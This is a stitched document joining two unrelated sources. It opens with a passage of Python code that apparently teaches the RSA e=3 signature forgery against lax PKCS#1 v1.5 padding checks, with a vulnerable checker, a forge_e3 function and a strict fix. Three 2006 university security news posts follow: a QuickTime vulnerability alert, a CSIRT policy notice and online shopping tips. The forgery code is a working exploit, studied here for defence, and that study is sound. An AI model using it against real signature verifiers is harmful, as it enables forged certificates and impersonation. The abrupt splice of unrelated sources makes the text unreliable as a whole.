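    """Vulnerable pattern: walk the padding and accept as soon as the DigestInfo
    matches. Whatever follows the hash is never examined."""
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:      # >= 8 bytes of FF, then 00
        return False
    t = digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t              # BUG: em[i + 1 + len(t):] ignored


def strict_check(em: bytes, msg: bytes) -> bool:
    """Fix: rebuild the only valid encoding and compare every byte."""
    return em == emsa_pkcs1_v15(msg, len(em))


def icbrt_ceil(x: int) -> int:
    """Smallest integer s with s**3 >= x (Newton from above, then settle exactly)."""
    s = 1 << ((x.bit_length() + 2) // 3)
    while (t := (2 * s + x // (s * s)) // 3) < s:
        s = t
    while s ** 3 > x:
        s -= 1
    while (s + 1) ** 3 <= x:
        s += 1
    return s if s ** 3 == x else s + 1


def forge_e3(msg: bytes, n: int) -> int:
    """Forge without the private key: place a valid-looking head at the top of the
    block and let the zeroed low part absorb the cube-root rounding error. Needs
    e = 3 and a block in which the head is well under a third (2048 bits suffices)."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    garbage_bits = 8 * (k - len(head))
    target = int.from_bytes(head, "big") << garbage_bits
    s = icbrt_ceil(target)
    if not (s ** 3 < target + (1 << garbage_bits) and s ** 3 < n):
        raise ValueError("block too small for this construction")
    return s


def demo(msg: bytes = b"CN=www.example.com") -> dict:
    """msg is a constructed stand-in for the to-be-signed bytes of a certificate."""
    k = (N.bit_length() + 7) // 8
    genuine = emsa_pkcs1_v15(msg, k)          # what a real signature recovers to
    forged = recover(forge_e3(msg, N), N)
    return {"lax_genuine": lax_check(genuine, msg), "lax_forged": lax_check(forged, msg),
            "strict_genuine": strict_check(genuine, msg), "strict_forged": strict_check(forged, msg)}


if __name__ == "__main__":
    print(demo())
```

The forgery works because s = ceil(cbrt(target)) gives s^3 < n, so no modular reduction happens, and the rounding error of the cube root is far smaller than 2^(8 * garbage bytes); that requires the garbage region to cover more than roughly two thirds of the block, which a 46-byte head inside a 256-byte block leaves room for. A key with e = 65537 defeats this particular construction, but the robust fix is the strict byte-for-byte comparison, which does not depend on the exponent.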
Apple QuickTime Vulnerabilities
By Harper Johnson
September 15, 2006 -
Please share this information. Note that this can
have an impact on Mac and Windows users.
National Cyber Alert System
Cyber Security Alert SA06-256A
- Apple QuickTime Vulnerabilities
- Original release date: September 13, 2006
Last revised: --
Source: US-CERT
- Systems Affected
- Apple QuickTime for
- Apple Mac OS X
- Microsoft Windows
- Overview
- Apple has released Apple QuickTime 7.1.3 to correct several
vulnerabilities. These vulnerabilities could allow an attacker to
gain access to your computer.
- Solution
- Install an Update
OS X users should use the Mac OS X
Software Update feature to download and install Apple QuickTime 7.1.3.
Consider scheduling Software Update to check for updates automatically
(this option is enabled by default).
Microsoft Windows users should upgrade to Apple QuickTime 7.1.3.
- Description
QuickTime prior to version 7.1.3 has multiple image and media
file handling vulnerabilities that could allow an attacker to run
malicious programs on your computer. This could happen by visiting
a malicious web site or by opening a crafted image or movie file.
Upgrading to Apple QuickTime version 7.1.3 will correct these
vulnerabilities.
Note that QuickTime is included with Apple iTunes.
For more technical information, see US-CERT Technical Alert TA06-256A
and the Apple QuickTime Security Update.
CSIRT Draft Policy Available
By Harper Johnson
August 18, 2006 -
The complexity of computer and network infrastructures and the challenge
of administering them make it difficult to manage network security properly.
Network and system administrators often do not have sufficient staff or
security practices in place to defend against attacks and minimize
damage. As a result, the number of computer security incidents is rising.
When computer security incidents occur, organizations must respond
quickly and effectively. The faster an organization recognizes, analyzes,
and responds to an incident, the better it can limit damage and lessen
recovery costs. Establishing a Computer Security Incident Response Team
(CSIRT) is a good way to provide this rapid response capability and to
help prevent future incidents.
The draft of the CSIRT policy is available in PDF and DOC formats.
Online Shopping: Tips to protect yourself from online scams
By Harper Johnson
August 18, 2006 -
The Internet can make your shopping faster and easier, but there can also
be pitfalls if you're not careful. Here is some advice from the National
Consumers League, the Better Business Bureau and the National Cyber
Security Alliance for a safe online shopping experience:
- Know who you're dealing with.
Check out unfamiliar sellers with the Better Business Bureau and your
state or local consumer protection agency. If you're buying
gifts on an online auction site that provides a feedback forum, check the
track record of the seller before you bid. Don't buy things in response
to unsolicited e-mails from unknown companies, since these may be
fraudulent.
- Get all the details.
Get the name and physical address of the seller; how much the product
or service costs; what is included for that price; whether there are
shipping charges; the delivery time, if any; the seller's privacy policy;
and the cancellation and return policy.
- Look for signs that online purchases are secure.
When you provide your payment information, the URL should begin with
https rather than http, indicating that the information is encrypted in
transit so that only the seller's server can read it. Your browser may
also signal a secure connection with a symbol, such as a broken key that
becomes whole or a padlock that closes. The padlock only means the
connection is encrypted to the site named in the certificate; it does not
vouch for the seller, so also check that the address bar shows the
seller's real domain.
- Pay the safest way.
It's best to use a credit card, especially when you're purchasing something
that will be delivered later, because under federal law you can dispute the
charges if you don't get what you were promised. You also have dispute rights
if there are unauthorized charges on your credit card, and many card issuers
have "zero liability" policies under which you pay nothing if someone steals
your credit card number and uses it.
- Never enter your personal information in a pop-up screen.
When you visit a company's Web site, an unauthorized pop-up screen
created by an identity thief could appear, with blanks for you to provide your
personal information. Legitimate companies don't ask for personal information
via pop-up screens. Install pop-up blocking software to avoid this type of scam.
- Keep documentation of your order.
When you've completed the online order process, there may be a final confirmation
page and/or you might receive confirmation by email. Print that information and
keep it handy in case you need it later.
- Know your rights.
Federal law requires orders made by mail, phone or online to be shipped by the
date promised or, if no delivery time was stated, within 30 days. If the goods
aren't shipped on time, you can cancel and demand a refund. There is no general
three-day cancellation right, but you do have the right to reject merchandise if
it's defective or was misrepresented. Otherwise, it's the company's policies that
determine if you can cancel the purchase and whether you can get a refund or credit.
- Be suspicious if someone contacts you unexpectedly and asks for your
personal information.
Identity thieves send out bogus e-mails about problems with consumers' accounts
to lure them into providing their personal information. Legitimate companies
don't operate that way.
- Check your credit card and bank statements carefully.
Notify the bank immediately if there are unauthorized charges or debits, if you
were charged more than you should have been, or if there are any other problems.
- Keep your computer secure for safe shopping and other online activities.
Protect your computer with spam filters, anti-virus and anti-spyware
software, and a firewall, and keep them up to date. Contact Northern Arizona
University's Solution Center to learn more about how to keep your computer
secure: (928) 523-1511.
- Beware of e-mails offering loans or credit, even if you have credit problems.
Con artists take advantage of cash-strapped consumers during the holidays
to offer personal loans or credit cards for a fee upfront. These scammers simply
take the money and run.
- Contact the seller promptly about any problems with your order.
Check the company's Web site for a customer service page, "contact us" link,
email address, or phone number to get your complaint addressed or questions
answered. If you can't resolve the problem, contact the Better Business
Bureau or your state or local consumer protection agency for help.